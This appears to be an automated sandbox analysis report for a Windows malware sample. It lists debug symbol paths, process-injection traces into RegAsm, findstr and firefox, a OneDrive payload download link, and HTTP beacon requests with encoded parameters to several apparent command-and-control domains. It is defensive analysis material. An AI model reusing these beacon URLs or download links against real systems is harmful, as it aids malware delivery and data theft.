            Source: Binary string: sers\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbllu# source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uu.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Elaniabdv.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Documents\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdbbq source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb[ source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb37-8B11-F424491E3931}\Servererver32mmon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3320587311.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3320993994.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: C:\Windows\Elaniabdv.pdbpdbbdv.pdbdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb7 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: findstr.pdbGCTL source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb.> source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: Microsoft.CSharp.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: n4C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: o.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: symbols\pif\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.0000000001372000.00000004.00000020.00020000.00000000.sdmp, WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Drawing.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Users\user\Documents\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb source: 4Ear91jgQ7.exe, 4Ear91jgQ7.pif.pif.pif.pif.pif.67.dr, 4Ear91jgQ7.pif.pif.pif.32.dr, 4Ear91jgQ7.pif.pif.pif.pif.pif.pif.74.dr, 4Ear91jgQ7.pif.pif.13.dr, 4Ear91jgQ7.pif.pif.pif.pif.48.dr, 4Ear91jgQ7.pif.5.dr
            Source: Binary string: System.Core.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.pdbMZ source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbts\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: global traffic HTTP traffic detected: GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
            Source: Joe Sandbox View IP Address: 13.107.139.11 13.107.139.11
            Source: Joe Sandbox View IP Address: 43.155.26.241 43.155.26.241
            Source: Joe Sandbox View IP Address: 13.107.137.11 13.107.137.11
            Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global traffic DNS traffic detected: DNS query: onedrive.live.com
            Source: global traffic DNS traffic detected: DNS query: cdsf1g.db.files.1drv.com
            Source: global traffic DNS traffic detected: DNS query: www.gospelstudygroup.org
            Source: global traffic DNS traffic detected: DNS query: www.valerieomage.com
            Source: global traffic DNS traffic detected: DNS query: www.instantmailer.cloud
            Source: global traffic DNS traffic detected: DNS query: www.kosherphonestore.com
            Source: global traffic DNS traffic detected: DNS query: www.cwgehkk.store
            Source: unknown HTTP traffic detected: POST /ktbm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.kosherphonestore.com Origin: http://www.kosherphonestore.com Referer: http://www.kosherphonestore.com/ktbm/ Content-Length: 204 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3345359746.00000000057F9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cwgehkk.store
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3345359746.00000000057F9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cwgehkk.store/kwl6/
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4m4LKvhJ_pTnz9rawaJjs2KZErvU8neZdJYfN9Hc3hkDV_oDM8LwyhXl_csc1M6IVr
            Source: 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4m55yNyrfmR788IlgrTwCE-wIZNwJTU2JVOtkkPb1qgGdeCZ2PORv3tzG8rnttZ1cB
            Source: 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mE8p9HhoIpPnY2ZSkO-k2QoyiDP1eEVixXoeiZO3gSa-GRM46_Yn-B7ipY2YArCUE
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mP83fG79GWrLdMGamez0hrTjn2wKcdfccPJocaqFvFmy0YwM8XhejQeyEmWBqIIPJ
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mTVGq-8d-NYEWVY690_WG8M-flr_PfcRMpSRv1BSgDK_Xdu7-xjZQd9se4iAmRZer
            Source: 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8m
            Source: 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6F
            Source: 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA
            Source: 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mmRCyddZd8TgumTkc0WgJGPW0Be2KAP8RA1AGW9Yg-qGmwy0u0VLZAuymVEdH6LS2
            Source: 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mo4p-JVtoRBSqHrQiA9KeG1S6nMOtlwjW-1eDspeJcYnm3M5qDvMNKDA9M8fz9FBK
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000027D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdsf1g.db.files.1drv.com/y4mxEYTjyjp5LfgrlSoxPuo-qFG-8J5AXctRyKSa4F8HTVl2y0jju6xUKiA_toKgQU3
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033qk
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000012.00000003.2679637488.0000000007C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=7EE64AC18753AFFC
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=
            Source: findstr.exe, 00000012.00000002.3330731863.0000000003F46000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.00000000038E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002FB16000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
